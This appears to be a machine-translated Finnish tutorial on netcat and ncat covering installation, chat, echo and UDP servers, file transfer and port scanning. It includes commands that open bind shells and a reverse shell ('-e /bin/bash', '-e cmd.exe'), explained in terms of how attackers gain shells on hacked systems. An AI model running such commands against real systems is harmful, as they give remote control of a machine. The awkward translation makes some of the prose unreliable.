Netcat

Netcat on terminaali sovellus, joka on samankaltainen kuin telnet-ohjelma, mutta on paljon enemmän ominaisuuksia.

sen ”tehoversio” perinteisestä telnet-ohjelmasta.

Lukuun ottamatta perus telnet toiminnot se voi tehdä monia muita asioita, kuten luoda socket palvelimet kuunnella saapuvia yhteyksiä satamiin, siirtää tiedostoja terminaalin jne.

Joten se on pieni työkalu, joka on täynnä paljon ominaisuuksia., Siksi sitä kutsutaan ”Sveitsin armeijan veitsi TCP / IP”.

netcat käsin määritellään netcat kuten

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.

Joten periaatteessa netcat on työkalu tehdä joitakin kaksisuuntainen verkkoyhteys TCP/UDP-protokollia.

teknisesti ottaen, netcat voi toimia socket palvelin tai työasema ja vuorovaikutuksessa muiden ohjelmia samanaikaisesti lähettää ja vastaanottaa tietoja verkon kautta.

tällainen määritelmä kuulostaa liian yleiseltä ja tekee vaikeaksi ymmärtää, mitä tämä työkalu tarkalleen tekee ja mihin se on hyödyllinen., Tämä voidaan ymmärtää vain käyttämällä ja pelaamalla sitä.

Ncat

Joten ensimmäinen asia tehdä, on setup netcat koneeseen. Netcat tulee eri makuja. Se on saatavilla useilta myyjiltä.

, mutta useimmilla on samanlainen toiminnallisuus. Ubuntussa on 3 pakettia nimeltään netcat-openbsd, netcat-traditional ja ncat.

suosikkiversioni on ncat. Ncat on kehittänyt nmap joukkue on paras kaikista netcats saatavilla ja mikä tärkeintä sen cross platform ja toimii hyvin windows.,

Hankkeen verkkosivut:

Asenna Ncat Windows

Windows-versio netcat voi ladata

lataa ja pura tiedostot johonkin sopiva.

Tai ladata ncat windows-versio

Asenna Ncat Ubuntu / Linux Mint / Linux

Ubuntu syntaptic paketti on netcat-openbsd-ja netcat-perinteinen paketteja. Asenna molemmat. Nmap: ssä on myös netcat-toteutus nimeltään ncat. Asenna sekin.,

Asenna Ubuntu

$ sudo apt-get install netcat-traditional netcat-openbsd nmap

käyttää netcat-openbsd toteutus käyttää ”nc” – komento.
käyttää netcat-perinteistä toteutuskäyttöä ” nc.perinteinen ” komento
nmap ncat: n käyttämiseksi käyttää ”ncat” – käskyä.

Netcat Komento Esimerkkejä

seuraavassa opetusohjelmassa aiomme käyttää niitä kaikkia eri esimerkkejä eri tavoin.

Telnet

aivan ensimmäiseksi netcatia voidaan käyttää kuten telnet-ohjelmaa. Katsotaan miten.

$ nc -v google.com 80

Nyt netcat on kytketty google.com port 80 ja sen aika lähettää joku viesti., Yritetään hakea indeksisivu. Tälle tyypille ” GET index.html HTTP / 1.1 ” ja paina Enter-näppäintä kahdesti. Muista kahdesti.

lähtö google.com on vastaanotettu ja kaikui terminaalin.

Simple socket server

avaa yksinkertaisen socket server-tyypin seuraavassa komennossa.

$ nc -l -v 1234

yllä oleva komento tarkoittaa : Netcat Kuuntele TCP-portti 1234. – V-vaihtoehto antaa verbose ulostulo paremman ymmärryksen., Nyt toinen päätelaite yrittää muodostaa yhteyden porttiin 1234 käyttäen telnet-komento seuraavasti :

$ telnet localhost 1234Trying 127.0.0.1...Connected to localhost.Escape character is '^]'.abcting tong

Kun liität me lähettää testi viesti, kuten abc ja ting tong, että netcat socket server. Netcat socket server toistaa telnet-asiakkaalta saadut tiedot.

$ nc -l -v 5555Connection from 127.0.0.1 port 5555 acceptedabcting tong

Tämä on täydellinen Chattailuun Järjestelmän. Kirjoita jotain netcat-terminaaliin ja se näkyy myös telnet-terminaalissa. Joten tätä tekniikkaa voidaan käyttää chattailuun välillä 2 koneita.,

Täydellinen KAIKU-Palvelin

Ncat-c-optio voidaan aloittaa echo server. Lähde,

Aloittaa echo server käyttäen ncat seuraavasti

$ ncat -v -l -p 5555 -c 'while true; do read i && echo $i; done'

Nyt toisesta terminaali muodostaa yhteyden käyttämällä telnet ja kirjoita jotain. Se lähetetään takaisin ”” prefiksattuna.
netcat-openbsd-versiossa ei ole-c-vaihtoehtoa. Muista aina käyttää-v vaihtoehto verbose ulostulo.

Huomautus : Netcat voidaan kehottaa tallentamaan tiedot tiedostoon sen sijaan, että se kaikuisi päätelaitteelle.,

$ nc -l -v 1234 > data.txt

Luo UDP-Palvelin

Netcat toimii udp-portit samoin. Aloittaa netcat-palvelimen udp-portit käytä -u vaihtoehto

$ nc -v -ul 7000

UDP-Asiakas

Yhdistä tähän palvelimeen käyttäen netcat toisesta terminaali

$ nc localhost -u 7000

Nyt molemmat päätelaitteet voivat keskustella toistensa kanssa.

Tiedoston siirto

koko tiedosto voidaan siirtää netcat. Tässä on nopea esimerkki.

Yksi kone – Lähetä Tiedosto

$ cat happy.txt | ncat -v -l -p 5555Ncat: Version 5.21 ( http://nmap.org/ncat )Ncat: Listening on 0.0.0.0:5555

edellä komento, kissa komento lukee ja lähdöt sisältö onnellinen.txt., Ulostulo ei kaiku päätelaitteelle, vaan se johdetaan tai syötetään NCAT: lle, joka on avannut socket Serverin portissa 5555.

koneen B – Receive –

$ ncat localhost 5555 > happy_copy.txt

edellä komento ncat yhteyden localhost port 5555 ja mitä se saa on kirjoittanut happy_copy.txt

now happy_copy.txt on kopio happysta.txt koska tiedot lähetetään port 5555 on sisältöä onnellinen.txt edellisessä komennossa.

Netcat lähettää tiedoston vain ensimmäiselle siihen kytkeytyvälle asiakkaalle. Sen jälkeen se on ohi.,
ja kun ensimmäinen asiakas sulkee yhteyden, myös netcat-palvelin sulkee yhteyden.

Porttien skannausta

Netcatia voidaan käyttää myös porttien skannaukseen. Tämä ei kuitenkaan ole netcat: n asianmukaista käyttöä, ja olisi käytettävä Nmap: n kaltaista soveltuvampaa työkalua.

– ”- n” – parametri täällä estää DNS lookup, ”-z” tekee nc ei vastaanota tietoja palvelimesta, ja ”-w 1” tekee yhteyden aikakatkaisu kun pelattu 1 sekunnin toimettomuuden jälkeen.

Kauko-Shell/Backdoor

Ncat voidaan aloittaa perus shell kauko-järjestelmä-portti ilman tarvetta ssh., Tässä on nopea esimerkki.

$ ncat -v -l -p 7777 -e /bin/bash

edellä mainitut alkaa server port 7777 ja siirtää kaikki saapuvat input bash komento, ja tulokset lähetetään takaisin. Komento käytännössä muuntaa bash-ohjelman palvelimeksi. Netcatia voidaan siis käyttää minkä tahansa prosessin muuntamiseen palvelimeksi.

Kytke tämän bash shell käyttää nc toisesta terminaali

$ nc localhost 7777

Nyt kokeilla suorittamalla tahansa komento, kuten auttaa , ls , pwd jne.

Windows

windows kone cmd.,exe (dos prompt program) – ohjelmaa käytetään samankaltaisen kuoren käynnistämiseen netcat: n avulla. Komennon syntaksi on sama.

C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exelistening on 8888 ...connect to from (UNKNOWN) 1182

Nyt toinen konsoli voi muodostaa yhteyden käyttämällä telnet-komento

Vaikka netcat vaikka voidaan setup kauko-ohjaimen kuoret, ei ole hyödyllistä saada interaktiivinen shell kauko-järjestelmä, koska useimmissa tapauksissa netcat ei olisi asennettu kauko-järjestelmä.

tehokkain tapa saada kuori on kauko kone käyttäen netcat on luoda käänteinen kuoret.,

Reverse Shells

Tämä on netcatin tehokkain ominaisuus, johon hakkerit käyttävät sitä eniten. Netcat on käytetty lähes kaikissa reverse shell tekniikoita kiinni käänteinen yhteys shell-ohjelman hakkeroitu järjestelmä.

Reverse telnet

Ensin otetaan esimerkkinä yksinkertainen reverse telnet-yhteys. Ordinate telnet-yhteydessä asiakas muodostaa yhteyden palvelimeen viestintäkanavan käynnistämiseksi.

Your system runs (# telnet server port_number) =============> Server

Nyt, käyttäen edellä tekniikkaa, voit liittää sanoa, port 80-palvelin noutaa verkkosivun., Hakkeri on kuitenkin kiinnostunut komentokuoren hankkimisesta. Sen komentokehote windows tai pääte linux. Komentokuori antaa etäjärjestelmän lopullisen hallinnan. Nyt etäpalvelimella ei ole käynnissä palvelua, johon voit muodostaa yhteyden ja saada komentokuoren.

joten kun hakkeri hakkeroi järjestelmään, hänen on saatava komentokuori. Koska se ei ole mahdollista suoraan, ratkaisu on käyttää käänteinen kuori. Käänteisessä kuoressa palvelin käynnistää yhteyden hakkerin koneeseen ja antaa komentokuoren.,

Step 1 : Hacker machine (waiting for incoming connection)Step 2 : Server ==============> Hacker machine

odottaa saapuvia yhteyksiä, paikallinen socket kuuntelija on avattu. Netcat / ncat pystyy tähän.
ensin netcat-palvelin on käynnistettävä paikalliskoneella tai hakkerin koneella.

koneen

$ ncat -v -l -p 8888Ncat: Version 6.00 ( http://nmap.org/ncat )Ncat: Listening on :::8888Ncat: Listening on 0.0.0.0:8888

edellä mainitut alkaa socket server (kuuntelija) port 8888 paikallisella koneella/hacker kone.

Nyt käänteinen shell on käynnistänyt kohde kone/hakkeroitu kone. On olemassa useita tapoja käynnistää käänteinen kuoret.,

tahansa menetelmä ei toimi, hakkeri joko on voitava suorittaa mielivaltainen komento järjestelmän tai pitäisi pystyä ladata tiedoston, joka voidaan suorittaa avaamalla selaimen (kuten php-skripti).

tässä esimerkissä emme tee kumpaakaan edellä mainituista asioista. Suoritamme netcatin palvelimella ja heitämme käänteisen komentokuoren esittelemään konseptin. Netcat on siis asennettava palvelimelle tai kohdekoneelle.,

Kone B :

$ ncat localhost 8888 -e /bin/bash

Tämä komento yhdistää laitteen porttiin 8888 ja syöttää lähtö bash tehokkaasti, jolloin kuori kone A. Nyt kone voi suorittaa minkä tahansa komennon koneeseen B.

Koneen

todellinen hakkerointi/levinneisyys testaus skenaario, se ei ole mahdollista ajaa netcat on tavoite kone. Siksi käytetään muita tekniikoita kuoren luomiseksi. Näihin kuuluvat käänteisen shell php-komentosarjojen lataaminen ja niiden suorittaminen avaamalla ne selaimessa. Tai käynnistää puskurin ylivuoto hyödyntää suorittaa käänteinen shell hyötykuorma.,

päätelmä

joten edellä mainituissa esimerkeissä näimme, miten netcatia käytetään erilaisiin verkkotoimintoihin, kuten telnet, reverse shells jne. Hakkerit käyttävät sitä lähinnä nopeiden käänteiskuorien luomiseen.

tässä opetusohjelmassa Käsittelimme joitakin netcatin perus-ja yleiskäyttötapoja. Katso Wikipedian artikkelista lisää tietoa siitä, mitä muuta netcat voi tehdä.

Vastaa

Sähköpostiosoitettasi ei julkaista. Pakolliset kentät on merkitty *